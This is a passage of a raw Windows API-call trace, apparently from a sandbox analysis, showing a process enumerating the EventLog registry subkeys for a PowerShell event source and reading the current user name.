	[0670.187] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x0) returned 0x2
	[0670.188] RegOpenKeyExW (in: hKey=0x2d8, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x334) returned 0x0
	[0670.188] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x0) returned 0x2
	[0670.188] RegOpenKeyExW (in: hKey=0x2d8, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x338) returned 0x0
	[0670.188] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x33c) returned 0x0
	[0670.188] RegCloseKey (hKey=0x33c) returned 0x0
	[0670.188] RegCloseKey (hKey=0x2d8) returned 0x0
	[0670.189] RegCloseKey (hKey=0x338) returned 0x0
	[0671.584] CoTaskMemAlloc (cb=0x804) returned 0x1b8eaee0
	[0671.584] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8eaee0, nSize=0x16d7c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d7c8) returned 0x1
	[0671.586] CoTaskMemFree (pv=0x1b8eaee0) 
	[0671.587] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0671.587] GetUserNameW (in: lpBuffer=0x293a20, pcbBuffer=0x16d808 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d808) returned 1
	[0671.587] CoTaskMemFree (pv=0x293a20) 
	[0673.303] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d508 | out: phkResult=0x16d508*=0x340) returned 0x0
	[0673.303] RegQueryInfoKeyW (in: hKey=0x340, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d47c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d478, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d47c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d478*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.303] CoTaskMemFree (pv=0x0) 
	[0673.303] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.303] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x0, lpName=0x293a20, lpcchName=0x16d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.303] CoTaskMemFree (pv=0x293a20) 
	[0673.303] CoTaskMemFree (pv=0x0) 
	[0673.303] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.303] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x1, lpName=0x293a20, lpcchName=0x16d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.304] CoTaskMemFree (pv=0x293a20) 
	[0673.304] CoTaskMemFree (pv=0x0) 
	[0673.304] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.304] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x2, lpName=0x293a20, lpcchName=0x16d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.304] CoTaskMemFree (pv=0x293a20) 
	[0673.304] CoTaskMemFree (pv=0x0) 
	[0673.304] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.304] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x3, lpName=0x293a20, lpcchName=0x16d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.304] CoTaskMemFree (pv=0x293a20) 
	[0673.304] CoTaskMemFree (pv=0x0) 
	[0673.304] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.304] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x4, lpName=0x293a20, lpcchName=0x16d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.304] CoTaskMemFree (pv=0x293a20) 
	[0673.304] CoTaskMemFree (pv=0x0) 
	[0673.304] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.304] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x5, lpName=0x293a20, lpcchName=0x16d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.305] CoTaskMemFree (pv=0x293a20) 
	[0673.305] CoTaskMemFree (pv=0x0) 
	[0673.305] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.305] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x6, lpName=0x293a20, lpcchName=0x16d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.305] CoTaskMemFree (pv=0x293a20) 
	[0673.305] CoTaskMemFree (pv=0x0) 
	[0673.305] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.305] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x7, lpName=0x293a20, lpcchName=0x16d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.305] CoTaskMemFree (pv=0x293a20) 
	[0673.305] CoTaskMemFree (pv=0x0) 
	[0673.305] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.305] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x8, lpName=0x293a20, lpcchName=0x16d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.305] CoTaskMemFree (pv=0x293a20) 
	[0673.305] CoTaskMemFree (pv=0x0) 
	[0673.305] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x344) returned 0x0
	[0673.306] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x0) returned 0x2
	[0673.306] RegOpenKeyExW (in: hKey=0x340, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x348) returned 0x0
	[0673.306] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x0) returned 0x2
	[0673.306] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x34c) returned 0x0
	[0673.306] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x0) returned 0x2
	[0673.306] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x350) returned 0x0
	[0673.306] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x0) returned 0x2
	[0673.306] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x354) returned 0x0
	[0673.306] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x0) returned 0x2
	[0673.307] RegOpenKeyExW (in: hKey=0x340, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x358) returned 0x0
	[0673.307] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x0) returned 0x2
	[0673.307] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x35c) returned 0x0
	[0673.307] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x0) returned 0x2
	[0673.307] RegOpenKeyExW (in: hKey=0x340, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x360) returned 0x0
	[0673.307] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x0) returned 0x2
	[0673.307] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x364) returned 0x0
	[0673.307] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x368) returned 0x0
	[0673.308] RegCloseKey (hKey=0x368) returned 0x0
	[0673.308] RegCloseKey (hKey=0x340) returned 0x0
	[0673.308] RegCloseKey (hKey=0x364) returned 0x0
	[0673.309] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d508 | out: phkResult=0x16d508*=0x364) returned 0x0
	[0673.309] RegQueryInfoKeyW (in: hKey=0x364, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d47c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d478, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d47c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d478*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.309] CoTaskMemFree (pv=0x0) 
	[0673.309] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.309] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x0, lpName=0x293a20, lpcchName=0x16d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.309] CoTaskMemFree (pv=0x293a20) 
	[0673.309] CoTaskMemFree (pv=0x0) 
	[0673.309] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.309] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x1, lpName=0x293a20, lpcchName=0x16d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.310] CoTaskMemFree (pv=0x293a20) 
	[0673.310] CoTaskMemFree (pv=0x0) 
	[0673.310] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.310] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x2, lpName=0x293a20, lpcchName=0x16d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.310] CoTaskMemFree (pv=0x293a20) 
	[0673.310] CoTaskMemFree (pv=0x0) 
	[0673.310] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.310] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x3, lpName=0x293a20, lpcchName=0x16d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.310] CoTaskMemFree (pv=0x293a20) 
	[0673.310] CoTaskMemFree (pv=0x0) 
	[0673.310] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.310] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x4, lpName=0x293a20, lpcchName=0x16d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.310] CoTaskMemFree (pv=0x293a20) 
	[0673.310] CoTaskMemFree (pv=0x0) 
	[0673.311] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.311] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x5, lpName=0x293a20, lpcchName=0x16d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.311] CoTaskMemFree (pv=0x293a20) 
	[0673.311] CoTaskMemFree (pv=0x0) 
	[0673.311] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.311] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x6, lpName=0x293a20, lpcchName=0x16d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.311] CoTaskMemFree (pv=0x293a20) 
	[0673.311] CoTaskMemFree (pv=0x0) 
	[0673.311] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.311] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x7, lpName=0x293a20, lpcchName=0x16d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.311] CoTaskMemFree (pv=0x293a20) 
	[0673.311] CoTaskMemFree (pv=0x0) 
	[0673.311] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.311] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x8, lpName=0x293a20, lpcchName=0x16d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.311] CoTaskMemFree (pv=0x293a20) 
	[0673.312] CoTaskMemFree (pv=0x0) 
	[0673.312] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x340) returned 0x0
	[0673.312] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x0) returned 0x2
	[0673.312] RegOpenKeyExW (in: hKey=0x364, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x368) returned 0x0
	[0673.312] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x0) returned 0x2
	[0673.312] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x36c) returned 0x0
	[0673.312] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x0) returned 0x2
	[0673.312] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x370) returned 0x0
	[0673.312] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x0) returned 0x2
	[0673.313] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x374) returned 0x0
	[0673.313] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x0) returned 0x2
	[0673.313] RegOpenKeyExW (in: hKey=0x364, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x378) returned 0x0
	[0673.313] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x0) returned 0x2
	[0673.313] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x37c) returned 0x0
	[0673.313] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x0) returned 0x2
	[0673.313] RegOpenKeyExW (in: hKey=0x364, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x380) returned 0x0
	[0673.313] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x0) returned 0x2
	[0673.313] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x384) returned 0x0
	[0673.314] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d568 | out: phkResult=0x16d568*=0x388) returned 0x0
	[0673.314] RegCloseKey (hKey=0x388) returned 0x0
	[0673.314] RegCloseKey (hKey=0x364) returned 0x0
	[0673.314] RegCloseKey (hKey=0x384) returned 0x0
	[0673.315] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4d8 | out: phkResult=0x16d4d8*=0x384) returned 0x0
	[0673.316] RegQueryInfoKeyW (in: hKey=0x384, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d44c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d448, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d44c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d448*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.316] CoTaskMemFree (pv=0x0) 
	[0673.316] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.316] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x0, lpName=0x293a20, lpcchName=0x16d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.316] CoTaskMemFree (pv=0x293a20) 
	[0673.316] CoTaskMemFree (pv=0x0) 
	[0673.316] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.316] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x1, lpName=0x293a20, lpcchName=0x16d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.316] CoTaskMemFree (pv=0x293a20) 
	[0673.316] CoTaskMemFree (pv=0x0) 
	[0673.316] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.316] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x2, lpName=0x293a20, lpcchName=0x16d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.316] CoTaskMemFree (pv=0x293a20) 
	[0673.316] CoTaskMemFree (pv=0x0) 
	[0673.316] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.317] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x3, lpName=0x293a20, lpcchName=0x16d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.317] CoTaskMemFree (pv=0x293a20) 
	[0673.317] CoTaskMemFree (pv=0x0) 
	[0673.317] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.317] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x4, lpName=0x293a20, lpcchName=0x16d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.317] CoTaskMemFree (pv=0x293a20) 
	[0673.317] CoTaskMemFree (pv=0x0) 
	[0673.317] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.317] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x5, lpName=0x293a20, lpcchName=0x16d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.317] CoTaskMemFree (pv=0x293a20) 
	[0673.317] CoTaskMemFree (pv=0x0) 
	[0673.317] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.317] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x6, lpName=0x293a20, lpcchName=0x16d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.317] CoTaskMemFree (pv=0x293a20) 
	[0673.317] CoTaskMemFree (pv=0x0) 
	[0673.318] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.318] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x7, lpName=0x293a20, lpcchName=0x16d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.318] CoTaskMemFree (pv=0x293a20) 
	[0673.318] CoTaskMemFree (pv=0x0) 
	[0673.318] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0673.318] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x8, lpName=0x293a20, lpcchName=0x16d4d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d4d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0673.318] CoTaskMemFree (pv=0x293a20) 
	[0673.318] CoTaskMemFree (pv=0x0) 
	[0673.318] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d538 | out: phkResult=0x16d538*=0x364) returned 0x0
	[0673.318] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d538 | out: phkResult=0x16d538*=0x0) returned 0x2
	[0673.318] RegOpenKeyExW (in: hKey=0x384, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d538 | out: phkResult=0x16d538*=0x388) returned 0x0
	[0673.318] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d538 | out: phkResult=0x16d538*=0x0) returned 0x2
	[0673.319] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d538 | out: phkResult=0x16d538*=0x38c) returned 0x0
	[0673.319] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d538 | out: phkResult=0x16d538*=0x0) returned 0x2
	[0673.319] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d538 | out: phkResult=0x16d538*=0x390) returned 0x0
	[0673.319] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d538 | out: phkResult=0x16d538*=0x0) returned 0x2
	[0673.319] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d538 | out: phkResult=0x16d538*=0x394) returned 0x0
	[0673.319] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d538 | out: phkResult=0x16d538*=0x0) returned 0x2
	[0673.319] RegOpenKeyExW (in: hKey=0x384, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d538 | out: phkResult=0x16d538*=0x398) returned 0x0
	[0673.319] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d538 | out: phkResult=0x16d538*=0x0) returned 0x2
	[0673.319] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d538 | out: phkResult=0x16d538*=0x39c) returned 0x0
	[0673.320] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d538 | out: phkResult=0x16d538*=0x0) returned 0x2
	[0673.320] RegOpenKeyExW (in: hKey=0x384, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d538 | out: phkResult=0x16d538*=0x3a0) returned 0x0
	[0673.320] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d538 | out: phkResult=0x16d538*=0x0) returned 0x2
	[0673.320] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d538 | out: phkResult=0x16d538*=0x3a4) returned 0x0
